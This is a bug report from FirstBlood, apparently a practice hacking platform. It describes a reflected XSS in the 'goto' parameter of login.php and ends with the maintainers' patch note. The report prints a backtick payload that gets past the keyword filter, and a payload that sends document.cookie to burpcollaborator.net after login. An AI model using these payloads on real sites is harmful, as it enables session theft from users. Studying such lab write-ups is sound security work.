FirstBlood-#478Reflective xss vis 'goto=' parmater on login.php
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-25, newrouge Level 3 reported:

Hey, I found that hidden paramter goto= is still vulnerable to xss. It reflects the user input in response. Although keywords like alert, onfocus and brackets were blocked but it can still be bypassed.

Steps:

  1. Visit URL https://ac13a34d19a2-newrouge.a.firstbloodhackers.com/login.php?goto=javascript:confirm`1`.

No alert, brackets keywords was used so it bypasses the filter.

  1. Enter your login credentials, Now you will see a popup.

Now Let's steal some cookies with this ;)

  • Visit this malicious url : https://ac13a34d19a2-newrouge.a.firstbloodhackers.com/login.php?goto=javascript:location.href=`http://burpcollaborator.net?${document.cookie}`

  • It will redirect the user after login to attacker domain and cookies will be logged to attacker's server.*

  • Login with your credentials.

  • Now you will be redirected to burp url, and your cookies are leaked.

Thank you

newrouge

P3 Medium

Endpoint: /login.php

Parameter: goto

Payload: javascript:location.href=`http://burpcollaborator.net?${document.cookie}`


FirstBlood ID: 39
Vulnerability Type: Reflective XSS

Our mistake: The parameter "goto" on login.php should of been "fixed" when redirecting to prevent XSS but due to an oversight from Sean and Karl, the new code did not make it into production. This has since updated since the event ended and you're recommended to re-try. It's related to bug ID 26 because the idea was developers fixed *this* one (when redirecting) but forgot the other reflection.